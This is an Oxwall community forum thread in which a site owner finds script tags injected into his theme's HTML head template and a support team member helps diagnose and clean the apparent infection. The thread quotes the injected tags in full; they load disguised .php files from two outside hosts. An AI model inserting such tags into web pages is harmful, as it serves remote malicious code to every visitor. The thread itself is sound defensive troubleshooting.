We build. You grow.

Get best community software here

Start a social network, a fan-site, an education project with oxwall - free opensource community software

Get started

Virus in the head | Forum

Topic location: Forum home » Support » Bug reports and troubleshooting

Alex Philipp Jun 4 '13

I see 2 links in the head of my site:

It only uploads with the site without redirections, but I didn`t add them and couldn`t see them through Admin/page settings and Searching through PHP My Admin

What can caused these links to the head?

Team

Alia Jun 5 '13

Alex,

1. what is your site URL?
2. what do you mean by 'head of the site': directly on the site ( if yes, where exactly), or within the source code of the head section?

Alex Philipp Jun 5 '13

Hello, Aliia,

1. Url is protected because of private info on site

2. It means that when we see the source code of each page through browser instruments we can see <head> SOME USUAL CODE for Oxwall + <script type="text/javascript" src="http://sodiummetal.com/wp-content/plugins/wp_modx/jquery-1.6.5.min.php"></script><script type="text/javascript" src="http://www.thaiathome.fr/wp-content/plugins/wp_api/jquery-1.6.4.min.php"></script> </head>

This code below doesn`t show us through Admin/settings/page

So this code has hidden attribute, I suppose. But I can`t find it through PHPMy Admin or Language or Admin of the site..

Team

Alia Jun 5 '13

Alex, I assume that you are on 1.5.X version of oxwall.
Can you go to ow_themes/origin/master_pages/html_document.html and check whether you have anything related to your code there?

Also, this code is visible in page source of admin panel's pages as well?

Alex Philipp Jun 5 '13

Yes, Aliia, I have 1.5.2 version

this code is invisible in page source of admin panel's pages

Ohhh, Thank you, Aliia

I`ve just found it in html_document.html Is that result of virus or hacker activity?

Alex Philipp Jun 5 '13

Looks like virus activity Because it was deleted by myself and now this code is still perfomed in html_document.html

How can we deactivate this code?

Team

Alia Jun 5 '13

Seems like virus for me too.
Two possible ways this code could have got into your .html file:
1. some kind of script installed on your site .
2. program installed on your computer.

What to do:

1. scan your computer using your anivirus software.
2. delete this code from html_document.html today and tomorrow check this file. Pay attention to the date when the file was last edited/changed.
3. check all folders and subfolders of your Oxwall installation. Look for anything that is not supposed to be there: for example folder names that don't match names used by Oxwall.
4. check your server's access logs.

Team

Alia Jun 5 '13

P.S. what are your permissions for "ow themes" "origin" "master_pages" folders and for .html documents within the last folder?

Alex Philipp Jun 5 '13

Just made it 644, but it was 755

After 644 I`ve deleted this code from html_document.html and enable dev mode to clean cookies, After that my head is clean from this code)

Thank you, Aliia for effective advices

The Forum post is edited by Alex Philipp Jun 5 '13

Team

Alia Jun 5 '13

Alex, glad that it worked for you.
But this didn't fix the cause of the issue. You just eliminated the outcome.
I strongly suggest to complete steps I listed in my previous reply.

#10

Oxwall Software

Please sign in

We build. You grow.

Start a social network, a fan-site, an education project with oxwall - free opensource community software

Virus in the head | Forum